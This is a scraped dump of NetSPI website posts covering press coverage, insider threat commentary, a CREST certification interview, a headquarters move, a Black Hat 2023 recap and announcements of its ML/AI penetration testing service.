NetSPI Field CISO Nabil Hannan shares advice on key vulnerabilities to be aware of during National Insider Threat Awareness Month. Read a preview below or view it online here.
+++
National Insider Threat Awareness Month (NITAM) is an annual, month-long campaign that takes place in September to educate government and industry about the risks posed by insider threats and the role of insider threat programs. This year's theme is "Bystander Engagement," which emphasizes the importance of all employees being aware of and reporting suspicious activity.
Insider threats are one of the most significant security risks facing organizations today. They can come from a variety of sources, including disgruntled employees, malicious insiders, and careless insiders. Insider threats can cause significant damage to an organization, including data breaches, financial losses, and reputational harm.
NITAM is a critical opportunity for organizations to raise awareness of insider threats and to implement effective insider threat programs. By educating employees about the risks and by encouraging them to report suspicious activity, organizations can help to protect themselves from insider threats.
Expert Commentary
In this roundup article, we will be sharing commentary from a number of industry experts on the importance of insider threat awareness. We hope that this article will help to raise awareness of insider threats and that it will encourage organizations to take the steps needed to protect themselves.
"This National Insider Threat Awareness Month, it’s important to raise awareness around some of the most commonly exploited vulnerabilities within an organization’s internal network. According to NetSPI’s 2023 Offensive Security Vision Report – which is based on more than 300,000 pentesting engagements – we found that excessive internal permissions continue to plague organizations. We witnessed network shares or SQL servers that unintentionally allowed access to all domain users, which often contain sensitive information, credentials to other services, or customer data (such as credit card numbers or PII). Unexpected excessive privileges lead to a large number of internal users having access to unintended sensitive data. All it takes is one rogue employee to cause major damage.
Additionally, weak or default passwords continue to be used within organizations, especially when accessing internal networks that contain highly sensitive information. Unlike interfaces exposed externally, interfaces on the internal network typically don’t require multi-factor authentication, making the likelihood of compromise much greater. Basic security hygiene, as well as an understanding of internal sharing protocols, can provide a solid foundation in bolstering protection against insider threats."
NetSPI CISO Norman Kromberg was featured in CSO's latest article on emerging threats in 2023. Read a preview below or view it online here.
+++
In cybersecurity’s never-ending cat-and-mouse game with hackers and grifters, the threats are always evolving. Here are some of the main attacks experts see as the biggest and baddest on the horizon.
Companies using Microsoft Teams got news earlier in the summer of 2023 that a Russian hacker group was using the platform to launch phishing attacks, putting a new spin on a long-known attack strategy. According to Microsoft Threat Intelligence, the hackers, identified as Midnight Blizzard, used Microsoft 365 tenants owned by small businesses compromised in previous attacks to host and launch new social engineering attacks.
Threats evolve constantly as hackers and grifters gain access to new technologies or come up with new ways to exploit old vulnerabilities. "It's a cat and mouse game," says Mark Ruchie, CISO of security firm Entrust.
The volume and velocity of attacks have increased, as have the costs incurred by victims, with the 2022 Official Cybercrimes Report from Cybersecurity Ventures estimating that the cost of cybercrime will jump from $3 trillion in 2015 to a projected $10.5 trillion in 2025.
At the same time, security leaders say they see new takes on standard attack methods -- such as the attacks launched by Midnight Blizzard (which has also been identified by the names APT29, Cozy Bear and NOBELIUM) -- as well as novel attack strategies. Data poisoning, SEO poisoning and AI-enabled threat actors are among the emerging threats facing CISOs today.
"The moment you agree to be a CISO, you agree to get into a race you never win completely, and there are constantly evolving things that you have to have on your screen," says Andreas Wuchner, field CISO for security company Panaseer and a member of the company's advisory board.
...
Preparing for what's next
A majority of CISOs are anticipating a changing threat landscape: 58% of security leaders expect a different set of cyber risks in the upcoming five years, according to a poll taken by search firm Heidrick & Struggles for its 2023 Global Chief Information Security Officer (CISO) Survey.
CISOs list AI and machine learning as the top themes in most significant cyber risks, with 46% saying as much. CISOs also list geopolitical, attacks, threats, cloud, quantum, and supply chain as other top cyber risk themes.
Authors of the Heidrick & Struggles survey noted that respondents offered some thoughts on the topic. For example, one wrote that there will be "a continued arms race for automation." Another wrote, "As attackers increase [the] attack cycle, respondents must move faster." A third shared that "Cyber threats [will be] at machine speed, whereas defenses will be at human speed."
The authors added, "Others expressed similar concerns, that skills will not scale from old to new. Still others had more existential fears, citing the 'dramatic erosion in our ability to discern truth from fiction.'"
Security leaders say the best way to prepare for evolving threats and any new ones that might emerge is to follow established best practices while also layering in new technologies and strategies to strengthen defenses and create proactive elements into enterprise security.
"It's taking the fundamentals and applying new techniques where you can to advance [your security posture] and create a defense in depth so you can get to that next level, so you can get to a point where you could detect anything novel," says Norman Kromberg, CISO of security software company NetSPI. "That approach could give you enough capability to identify that unknown thing."
[post_title] => CSO: Emerging cyber threats in 2023 from AI to quantum to data poisoning
[post_excerpt] => NetSPI CISO Norman Kromberg was featured in CSO's latest article on emerging threats in 2023.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => cso-emerging-cyber-threats-in-2023
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-14 15:27:15
[post_modified_gmt] => 2023-09-14 20:27:15
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31051
[menu_order] => 4
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[2] => WP_Post Object
(
[ID] => 31047
[post_author] => 91
[post_date] => 2023-09-01 09:00:00
[post_date_gmt] => 2023-09-01 14:00:00
[post_content] =>
Larry Trowell, NetSPI's Director of IoT and Embedded Pentesting, was featured in Network Computing's latest article on securing Industrial IoT (IIoT) networks. Read a preview below or view it online here.
+++
Misconfiguration, ransomware, and alert fatigue could lead to downtime on industrial IoT networks in industries such as manufacturing and energy.
As IT, cloud, and industrial networks come together in industrial environments like shipping ports, oil refineries, and factories, organizations are facing new security threats.
In fact, Cisco says 35% of its customers mention security as a top obstacle to IoT. In addition, in the report “The State of Industrial Security in 2022" from Barracuda Networks, 93% of businesses reported that an IIoT/OT security project had failed.
In an Industrial IoT (IIoT) environment, networks, switches, routers, and wireless equipment connect to sensors on physical machinery. Because IIoT networks incorporate automation, they could bring new efficiencies by collecting data at the edge and enabling visibility into issues ahead of time. This process is called the Fourth Industrial Revolution, or Industry 4.0.
“Industrial IoT is basically bringing the [operational technology (OT)] and the IT together to get deeper insights in process telemetry and to use that to really improve the efficiency or deliver new services,” explains Anand Oswal, senior vice president and general manager of network security at Palo Alto Networks, in an interview.
These devices are typically built on a flat Layer 2 segmented architecture, according to Oswal. Flat networks link devices to a single switch rather than separate switches, and Layer 2 is the data link layer in the International Organization for Standardization (ISO) Open Systems Interconnection reference model.
As “things” get connected, network operators must pay more attention to the attack surface, Oswal notes.
“Threats move laterally, and exposure of formerly isolated OT systems may cause potential cyber threats from the IT domain and back and forth,” Oswal says. “Many of these IoT systems are part of larger operations. If these systems are disrupted, there could be loss of important data telemetry that leads to production decisions, poor analytics, or stoppage of operations,” Oswal notes. It could also lead to loss of life.
The Pace of Patching in Industrial IoT
Industries like manufacturing and oil and gas use older legacy systems that are lacking in security systems and were not designed for patching, explains Larry Trowell, director at penetration-testing company NetSPI.
“While these systems get the job done well when maintained, they were not necessarily built with modern security in mind,” he says.
[post_title] => Network Computing: What You Need to Know About Securing Industrial IoT Networks
[post_excerpt] => Larry Trowell, NetSPI's Director of IoT and Embedded Pentesting, was featured in Network Computing's article on securing Industrial IoT (IIoT) networks.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => network-computing-securing-industrial-iot-networks
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-14 15:25:48
[post_modified_gmt] => 2023-09-14 20:25:48
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=31047
[menu_order] => 6
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[3] => WP_Post Object
(
[ID] => 30898
[post_author] => 91
[post_date] => 2023-08-29 09:18:41
[post_date_gmt] => 2023-08-29 14:18:41
[post_content] =>
Learn about the journey to CREST certification directly from our offensive security consultants. CREST certification is an accreditation that establishes professional standards for penetration testing.
This Q&A between NetSPI EMEA Services Director Sam Kirkman and Senior Security Consultant Tyler Sullivan takes you through the process to achieve the CREST Certified Tester (CCT) qualification and how it enables NetSPI to better serve clients across the globe.
Watch the video below or read along with the Q&A.
https://www.youtube.com/watch?v=4tnLOf2nne8
Tyler, why don't you start off with a bit of an intro about yourself?
“I first got into cybersecurity while I was at university doing computer science and found it to be really interesting and had a real passion for it. So, I did my dissertation on cybersecurity. And after university, I was lucky enough to land a graduate job as a consultant. And this was sort of where my journey really began. I did a lot of web application testing and a lot of infrastructure testing, but particularly enjoyed web testing [...] And so that led me down the route of getting some qualifications in web security. And I went for and have achieved the CREST certification.”
Why is it important to achieve CREST certification?
In the UK in particular, CREST is a respected and well-known organisation. They accredit a lot of companies and certify a lot of individuals, so it’s a logical path for penetration testers to go down. Traditionally, individuals start out with the CREST Practitioner Security Examination Analyst (CPSA) examination.
For a security consultant just starting out, it's useful to have that first goal of passing the CPSA examination. When consultants start learning more about cybersecurity, then they can do the CREST registered tester (CRT) exam.
“What really drove me towards those exams initially was that it made sense logically and had a progression. But also, they’re well respected and challenging exams. If it’s difficult to get [these certifications], they're going to come with a lot of respect and really showcase your web skills.”
What is the journey like to pass the CPSA exam? Is it challenging right from the start?
When you’re working toward CPSA, it can seem a bit daunting as your first qualification in the industry. At first, there are a lot of simple fundamentals to learn, but at the same time it can be challenging as a new professional in the industry. The timeline between the exams is well laid out, which makes it manageable.
The CPSA is helpful because it teaches the necessary fundamentals, while the CRT covers a little bit of everything and goes much deeper on web infrastructure. By the time you prepare for these exams, you should be at least a mid-level tester.
When you get to the specific specialties, either application testing (CCT App) or infrastructure testing (CCT Inf), that's when you put your head down and focus. The final stage is split into two parts. First there is a multiple-choice exam, which is similar to the CPSA but much harder and covers a lot more material. Then you come to the practical exam, where you have an assault course and a scenario, which lasts about a day.
“I found the exam really tough, but really rewarding [...] By the end of it, your brain is fried, because it's just a really tough exam. But yeah, I passed in February last year and it's probably my best achievement in the industry so far.”
Does being CREST-certified change the way you can have conversations with customers and the way that they look at you as well?
CREST is well known in the UK especially because a lot of companies and clients do look for CREST certification and accreditation. One thing that is useful is that when you’re speaking with a client, you can be introduced as a CREST-certified tester. When clients look it up, they’ll see that it’s one of the best, most comprehensive web exams in the UK and one of the best in the world if you’re looking globally.
Overall, being CREST-certified makes it easier because clients can see that you’re knowledgeable. If you have this qualification, it shows that not only do you have theory knowledge, but also practical real-world cybersecurity experience and pentesting experience.
Do the skills developed during CREST exams help in the real world and in your day-to-day job as a penetration tester?
Knowledge from the exam is useful in day-to-day job scenarios. The exam teaches you how to deal with problems and unexpected inputs and scenarios, which is basically what penetration testing is. It's seeing something you haven't seen before and knowing how to apply certain theories that you've learned in different ways. And it's not always the same formula, it's very different each time.
The exam also has an element of reporting in there, which is obviously very important. At the end of the day, the report is what the client sees. And if you can't communicate the results properly, then the client is not able to fix what is shown in the results.
The CREST certification provides a great base and advanced knowledge and enables you to venture out into very niche parts of cybersecurity. However, it’s important to always continue learning.
“A lot of my learning happens outside of the qualifications as well. Being on the team here at NetSPI, there are a lot of talented people, not just talented in web security, but we have really good cloud people. There are hardware hackers; I don't think I've ever been in an environment where there are just so many specialists. And it's really good, because everything that you learn, even from people that are doing hardware hacking, is something so different. Being on the NetSPI team is a constant learning experience. I think in cybersecurity and penetration testing it's impossible to ever stop learning.”
Qualifications provide structure and a sense of achievement. And in the cybersecurity industry, continual learning is always important as the threat landscape continues to evolve. You mentioned that you never stop learning, have you decided what comes next for you?
“I think at the moment, I'm really enjoying just being able to have the freedom to go investigate something, or potentially go develop something. So, I think as a cyber professional, you do have to be able to do a little bit of everything. So, I've done a lot of development work recently and I've been enjoying writing some plugins and things that have helped me become a better and more efficient tester. For the time being, I’ll keep doing this for another two years, then I'll have to renew my CREST certification.”
NetSPI employs multiple CREST-registered and -certified penetration testers. CREST Registered Tester (CRT) is a mid-level qualification. CREST Certified Tester (CCT) is the higher-level qualification, earned for either application testing (CCT App) or infrastructure testing (CCT Inf).
Partner with NetSPI’s team of expert pentesters
NetSPI’s team of expert pentesters is available to provide always-on security, whether you need to scope a new engagement, parse real-time vulnerability reports, prioritise remediation, or ensure compliance. Learn more about NetSPI’s penetration testing as a service (PTaaS) or schedule a demo to speak with our team directly.
[post_title] => Q&A with Tyler Sullivan: The Journey to CREST Certification
[post_excerpt] => Learn about the journey to CREST certification directly from our offensive security consultants and how the certification helps in day-to-day pentesting work.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => the-journey-to-crest-certification
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-29 09:18:41
[post_modified_gmt] => 2023-08-29 14:18:41
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30898
[menu_order] => 7
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[4] => WP_Post Object
(
[ID] => 30951
[post_author] => 91
[post_date] => 2023-08-29 09:00:00
[post_date_gmt] => 2023-08-29 14:00:00
[post_content] =>
Minneapolis-based NetSPI is planning to move to a new North Loop headquarters, taking over half of the sublease space put on the market by Calabrio Inc. late last year.
The cybersecurity company will move into 60,000 square feet of space on the 11th and 12th floors of the Steelman Exchange building, at 241 Fifth Ave. N. Those floors – plus floors nine and 10 – are leased by Calabrio, a developer of call-center software, but were put up for sublease at the end of last year.
[post_title] => Minneapolis/St. Paul Business Journal: NetSPI moving to new North Loop HQ, takes over part of Calabrio sublease
[post_excerpt] => NetSPI's new Minneapolis headquarters was announced in the Minneapolis-St. Paul Business Journal.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => msp-business-journal-hq
[to_ping] =>
[pinged] =>
[post_modified] => 2023-09-05 11:54:10
[post_modified_gmt] => 2023-09-05 16:54:10
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30951
[menu_order] => 8
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[5] => WP_Post Object
(
[ID] => 30884
[post_author] => 91
[post_date] => 2023-08-29 07:00:00
[post_date_gmt] => 2023-08-29 12:00:00
[post_content] =>
The new, collaborative office space signals accelerated innovation and growth for the offensive security company.
Minneapolis, MN – August 29, 2023 – NetSPI, the global leader in offensive security, today announced its new headquarters location in the Steelman Exchange building in Minneapolis, Minnesota. The decision to move was prompted by the increasing employee headcount and the need for a more collaborative workplace as the company continues to experience rapid adoption. In 2023 to date, NetSPI has hired 150+ employees, completed 2,733 offensive security assessments, and welcomed 238 new customers.
“The Steelman Exchange is the perfect fit for our team as we enter a momentous and pivotal year for NetSPI,” shared Aaron Shilts, CEO at NetSPI. “This investment in our workplace will nurture our continued growth, promote collaboration and innovation in offensive security, and ensure we maintain the unique culture that makes NetSPI so special.”
There are several initiatives driving the offensive security company’s growth in 2023, including:
Emphasis on defining NetSPI’s offensive security product roadmap and vision, driven by continuous adoption of the company’s Penetration Testing as a Service (PTaaS), Attack Surface Management (ASM), and Breach and Attack Simulation (BAS) platforms.
Numerous innovations from the NetSPI Labs research and development team, including the launch of the Software as a Service (SaaS) Security Assessment and AI/ML Penetration Testing solutions, along with ongoing industry research and responsible disclosures, including two Azure vulnerability disclosures from the NetSPI cloud penetration testing team.
Expansion of the EMEA pentesting team and formalization of CREST and CHECK accreditations to perform mandated pentests in the region.
Strategic leadership and Board of Directors appointments, including Vinay Anand as Chief Product Officer, Jay Golonka as Chief Financial Officer, Nick Walker as Director of EMEA, and Scott Lundgren and John Spiliotis as members of the Board of Directors.
Exponential NetSPI Partner Program growth, with the introduction of 29 new partnerships in 2023 to date, including BMC Software, Optum, and Chubb.
The release of NetSPI’s inaugural Offensive Security Vision Report, with valuable insights on the top vulnerabilities by attack surface, the state of remediation, and cybersecurity hiring trends.
The acquisition of nVisium which continues to support scalability and delivery of its offensive security solutions.
NetSPI has been honored as a Top Workplaces USA winner for the past two years and as one of the best places to work in the state of Minnesota for three consecutive years. This year, the company ranked #12 on the midsize companies list, with special recognition for its innovation, employee appreciation, work-life flexibility, compensation and benefits, leadership, and purpose and values.
“We will continue to prioritize flexible and remote work options as a company,” explained Heather Crosley, VP of People Operations. “At the same time, we recognize that an intentional space to connect in-person can make an incredible impact on our ability to collaborate, innovate, and deliver the best offensive security solutions globally. And that’s exactly what this new space is designed to do.”
The move will take place in January 2024 and NetSPI will remain at its current headquarters at 800 N Washington Ave #670 in Minneapolis until then.
Michael Anderstrom at Colliers represented NetSPI in the transaction.
Visit www.netspi.com/careers to explore open roles in Minneapolis and its other US, India, Canada, and UK locations.
https://youtu.be/mkzEKUN4RSU
About NetSPI
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
[post_title] => NetSPI Moves to New Minneapolis Headquarters to Accommodate Growth
[post_excerpt] => Read about NetSPI’s move to a new Minneapolis headquarters to accommodate continued growth and innovation in the offensive security industry.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => new-netspi-headquarters
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-29 08:59:34
[post_modified_gmt] => 2023-08-29 13:59:34
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=30884
[menu_order] => 9
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[6] => WP_Post Object
(
[ID] => 30876
[post_author] => 91
[post_date] => 2023-08-24 12:15:39
[post_date_gmt] => 2023-08-24 17:15:39
[post_content] =>
As August comes to a close, we’re reliving the highlights from Black Hat 2023! Our team had a great time at this year’s event, complete with attending (and leading) workshops, launching new products, and of course, memorable evenings in the heart of Las Vegas.
https://www.youtube.com/watch?v=rJBCnT6QrwU
To all the NetSPI team members who attended Black Hat (and DEF CON 31!), and the key players who held down our home base, thank you for making this year’s conference a success! Tapping into this year’s theme, we really are better together. We asked a few of our offensive security experts to weigh in on the key themes, favorite conversations, and more details on what stole the show this year.
3 Key Themes from Black Hat 2023
NetSPI Field CISO Nabil Hannan shared four themes from Black Hat:
AI/ML was pervasive across vendors
More focus on AppSec, especially integrating it into CI/CD pipelines
Lots of interest in automotive, aerospace, and IoT security
Let’s explore these.
AI Stole the Show
A key theme at Black Hat was AI leading innovation in technology. Many vendors had AI-powered platforms on display — NetSPI included. Looking at the security industry as a whole, we’re still in the infancy of our collective AI journey. AI is powerful, but navigating this space alone is challenging.
NetSPI launched AI/ML Penetration Testing to help trailblazing companies stay creative with AI while remaining confident in the security of their new technologies. We’ve only begun to see the changes AI and ML can bring to security, and we can’t wait to build the next evolution together.
All about AppSec
Incorporating security into the application lifecycle is easier said than done. Fortunately, the industry is increasingly invested in security best practices throughout the development and testing phases to help address common risks. See the OWASP API Security Top 10 for the most prevalent vulnerabilities. Nabil noted that application security is being added specifically into continuous integration and continuous delivery (CI/CD) pipelines, meaning development teams have moved beyond AppSec in theory and into implementing it as a process.
Automotive. Aerospace. IoT. Oh My!
Digital transformation and Internet of Things (IoT) go hand-in-hand. And if those weren’t enough buzzwords for you, here’s one more: The digital footprint companies have today is vastly larger and more dynamic than ever before. Internet-facing technology holds a higher potential for exposure to threats because it has multiple access points with greater public accessibility. One of NetSPI’s specialties is IoT Penetration Testing across industries to help internet-facing assets remain secure.
NetSPI Director of IoT and Embedded Pentesting Larry Trowell noted aerospace as a trending industry at Black Hat because of its broad coverage area. As connected devices continue to become a must-have instead of a nice-to-have, security will progress as a necessity.
Bonus Theme: Azure Cloud Security
Okay, we’re cheating a little here as this was more a DEF CON theme versus Black Hat, but “hacker summer camp” nevertheless. Our resident Azure security expert and tenured DEF CON volunteer Karl Fosaaen made his way to Vegas for DEF CON 31. This year was extra special as Karl brought his dad along to experience the event for the first time!
In the wake of Tenable CEO Amit Yoran calling out Microsoft for its handling of vulnerability disclosures, Azure security was certainly a topic of conversation across the community. NetSPI had two opportunities to provide insights on how to navigate Azure cloud security concerns.
Karl was invited to speak with Ashish Rajan, host of the Cloud Security Podcast, on Azure insecurities, why pentesting must go beyond configuration reviews, the difference between testing AWS versus Azure, practical steps to strengthen Azure security, common attack TTPs, and more. The episode will air on Monday, August 28 – keep an eye out!
Later at the DEF CON Cloud Village, Karl and NetSPI’s cloud pentesting lead Thomas Elling led a talk titled, What the Function: A Deep Dive into Azure Function App Security. The talk centered around the security risks associated with the increasing use of Platform as a Service (PaaS) resources in the cloud, specifically the use of the Azure Function App service. If you missed the talk, no worries! They followed the session up with a detailed write-up on the NetSPI technical blog.
What’s it Take to Be a Global Leader?
Several companies at Black Hat self-proclaimed the title “leader” on their booths, enticing a curious mind to pose a question: what merits the claim of a leader? While we can’t speak for other companies, we can give insight into why NetSPI claims the title of global leader in offensive security.
In addition to third-party recognition, we hold the title of leader because we are trailblazing a path forward in offensive security so that teams have a partner in navigating this complex space. Our suite of offensive security solutions consolidates services with one vendor, giving us a deep understanding of client systems for more tailored recommendations.
NetSPI Chief of Product Vinay Anand spoke to this in his Black Hat presentation, Defining a Roadmap for Offensive Security. The presentation covered the past, present, and future of proactive security measures, why offensive security is today’s North Star for risk and exposure management, and how to make progress toward an offensive security strategy. Grab Vinay’s slides here.
Lastly, we invite you to meet our pentesting team, check out our recent research, and view our open-source tools. We guarantee you'll learn something that could only be taught by leaders in their field.
Between the learning opportunities, building connections new and old, and having great food and conversation with our trusted customers and peers, Black Hat lived up to its hype. Until next year!
[post_title] => Back in Black (Hat): Here's What Stole the Show
[post_excerpt] => Join us in reliving our Black Hat experience with three themes of the conference and what it takes to be a global leader in offensive security.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => back-in-black-hat-what-stole-the-show
[to_ping] =>
[pinged] =>
[post_modified] => 2023-08-25 11:00:15
[post_modified_gmt] => 2023-08-25 16:00:15
[guid] => https://www.netspi.com/?p=30876
)
[7] => WP_Post Object
(
[ID] => 30811
[post_author] => 91
[post_date] => 2023-08-10 09:00:00
[post_date_gmt] => 2023-08-10 14:00:00
[post_content] =>
Minneapolis, MN – August 10, 2023 – NetSPI, the global leader in offensive security, has announced a strategic collaboration with BMC, a global leader in software solutions for the Autonomous Digital Enterprise, to strengthen mainframe security for their customers. The collaboration aligns with BMC's commitment to partnering with best-of-breed security brands, enabling both companies to deliver enhanced cybersecurity solutions to organizations worldwide, with an emphasis on mainframe security.
BMC customers will now have access to NetSPI's comprehensive mainframe penetration testing solutions and state-of-the-art delivery platforms to evaluate mainframe and network security from an adversarial perspective. In return, NetSPI's solutions will use BMC Automated Mainframe Intelligence (BMC AMI) software assets, enabling automated vulnerability scanning to identify and address exploitable vulnerabilities. NetSPI will also contribute to the future development of the BMC AMI security portfolio, driving innovation in mainframe vulnerability management solutions.
John McKenny, Senior Vice President and General Manager of Intelligent Z Optimization and Transformation at BMC, highlighted the benefits of the effort, stating, "Our customers will benefit from independent pentesting services delivered by NetSPI, a world-leading brand in the cybersecurity field. Their expertise and insights on mainframe security will play a pivotal role in shaping the future of our BMC AMI Security portfolio."
“Mainframes still hold critical information and perform critical functions for a lot of large enterprises today. Regular security testing must be prioritized,” stated Philip Young, Director of Mainframe Pen-testing at NetSPI. “Enterprises can’t afford downtime on their mainframes. This collaboration ensures our mutual customers the best protection so they can continue innovating – with confidence.”
Lauren Gimmillaro, VP Business Development and Strategic Alliances at NetSPI, expressed her excitement about the new offerings, saying, "We are thrilled to join forces with BMC Software. This collaboration not only expands the reach of our offensive security solutions but also provides us with an opportunity to contribute to the BMC AMI Security portfolio, driving innovation and delivering comprehensive vulnerability management solutions to organizations worldwide."
For more information on BMC and NetSPI, please visit the following websites:
NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India.
BMC, BMC Software, the BMC logo, and other BMC marks are the exclusive properties of BMC Software, Inc. and are registered or may be registered with the U.S. Patent and Trademark Office or in other countries.
On August 9, 2023, CRN summarized 10 products launched at this year's Black Hat conference, including NetSPI's AI/ML Penetration Testing. Scroll to slide 10 in the online article here for the full story.
+++
NetSPI ML/AI Pentesting
NetSPI, whose offerings include penetration testing services and attack surface management, said at Black Hat 2023 that it’s expanding to provide security for machine learning technologies—such as the Large Language Models used in generative AI apps. Calling the ML/AI Pentesting a “first-of-its-kind” offering, NetSPI said that key capabilities include identification, analysis and remediation for ML models such as LLMs. The company is also now providing “real-world” guidance on issues related to the securing of ML models, NetSPI said in a news release.
[post_title] => CRN: 10 Cool New Security Products Unveiled At Black Hat 2023
[post_excerpt] => On August 9, 2023, CRN summarized 10 products launched at this year's Black Hat conference, including NetSPI's AI/ML Penetration Testing.
[post_modified] => 2023-09-13 11:46:01
[post_modified_gmt] => 2023-09-13 16:46:01
[guid] => https://www.netspi.com/?p=31024
)
[9] => WP_Post Object
(
[ID] => 31010
[post_author] => 91
[post_date] => 2023-08-08 09:00:00
[post_date_gmt] => 2023-08-08 14:00:00
[post_content] =>
SiliconANGLE shared NetSPI's announcement of AI/ML Penetration Testing on August 8, 2023 covering how the new solution brings a more holistic and proactive approach to safeguarding machine learning model implementations. Read the full story here.
+++
Cybersecurity services and software provider NetSPI LLC today announced a new machine learning and artificial intelligence penetration testing solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations.
Claimed to be the first of its kind, NetSPI’s ML/AI Pentesting solution focuses on two core components: identifying, analyzing and remediating vulnerabilities on machine learning systems such as large language models, and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
NetSPI argues that with the current pace of machine learning and AI adoption, it’s vital for organizations to understand the distinct threats inherent in this technology, such as pinpointing weak spots and architecting more secure models. The new service is rooted in NetSPI’s adversarial machine learning testing methodology — the study of adversarial attacks on machine learning and corresponding defenses.
Channel Futures rounds up the biggest headlines from Black Hat 2023, including NetSPI's debut of AI/ML Penetration Testing. Learn more and hear from NetSPI’s vice president of business development and strategic alliances, Lauren Gimmillaro, on slide 10 of the article here.
+++
Also at Black Hat, NetSPI debuted its machine learning/artificial intelligence (ML/AI) penetration testing solution aimed at bringing a more holistic and proactive approach to safeguarding ML model implementations.
The solution focuses on two core components. Those are identifying, analyzing and remediating vulnerabilities on ML systems such as large language models (LLMs), and providing grounded advice and real-world guidance to ensure security is considered from inception to implementation.
As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models, according to NetSPI.
Lauren Gimmillaro, NetSPI’s vice president of business development and strategic alliances, said NetSPI’s partners can help their customers navigate their ML/AI security challenges with confidence, backed by NetSPI’s expertise in ML and data science to help them secure their innovation.
“This new testing capability will open opportunities across their customers’ tech stack, including cloud, web and applications as our reports and recommendations for remediation are brought to them in real time,” she said. “Some specific examples of new opportunities include data set security, adversarial testing and API security.”
AI innovation and the fast adoption of ML systems into production is happening whether companies are ready or not, Gimmillaro said.
“It’s critical that we help our partners cater to a diverse range of industries and deployments in this space, from chatbots to data analytics, to text generation and everything in between,” she said. “Our testing methodology is rooted in adversarial ML and backed by a team of over 200 pen-testing experts that are equipped to test against real adversarial attack techniques. This is the advantage we help our partners deliver to their customers.”
[post_title] => Channel Futures: AI and Cybersecurity Take Center Stage at Largest-Ever Black Hat USA
[post_excerpt] => Channel Futures rounds up the biggest headlines from Black Hat 2023, including NetSPI's debut of AI/ML Penetration Testing.
[post_modified] => 2023-09-13 11:45:56
[post_modified_gmt] => 2023-09-13 16:45:56
[guid] => https://www.netspi.com/?p=31013
)
[11] => WP_Post Object
(
[ID] => 31027
[post_author] => 91
[post_date] => 2023-08-08 09:00:00
[post_date_gmt] => 2023-08-08 14:00:00
[post_content] =>
On August 8, 2023, insideBIGDATA shared NetSPI's announcement of AI/ML Penetration Testing with a focus on identifying, analyzing, and remediating vulnerabilities on machine learning systems such as Large Language Models (LLMs) and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
NetSPI, the global leader in offensive security, today debuted its ML/AI Pentesting solution to bring a more holistic and proactive approach to safeguarding machine learning model implementations. The first-of-its-kind solution focuses on two core components: Identifying, analyzing, and remediating vulnerabilities on machine learning systems such as Large Language Models (LLMs) and providing grounded advice and real-world guidance to ensure security is considered from ideation to implementation.
As adoption of ML and AI accelerates, organizations must understand the unique threats that accompany this technology to better identify areas of weakness and build more secure models. NetSPI’s testing methodology is rooted in adversarial machine learning – the study of adversarial attacks on ML and corresponding defenses. With this foundational research, the company’s offensive security experts have the knowledge to better understand and mitigate vulnerabilities within ML models by putting them to the test against real adversarial attack techniques.
Click here to read the full story on insideBIGDATA.
[post_title] => InsideBIGDATA: NetSPI Debuts ML/AI Penetration Testing, a Holistic Approach to Securing Machine Learning Models and LLM Implementations
[post_excerpt] => On August 8, 2023, insideBIGDATA shared NetSPI's announcement of AI/ML Penetration Testing with a focus on identifying, analyzing, and remediating vulnerabilities on machine learning systems.
[post_modified] => 2023-09-13 11:46:18
[post_modified_gmt] => 2023-09-13 16:46:18
[guid] => https://www.netspi.com/?p=31027
)
[12] => WP_Post Object
(
[ID] => 30754
[post_author] => 91
[post_date] => 2023-08-08 05:00:00
[post_date_gmt] => 2023-08-08 10:00:00
[post_content] =>
The new ML/AI pentesting solution combines the company’s proven pentesting methodology with its deep adversarial machine learning knowledge to help organizations build more secure models.
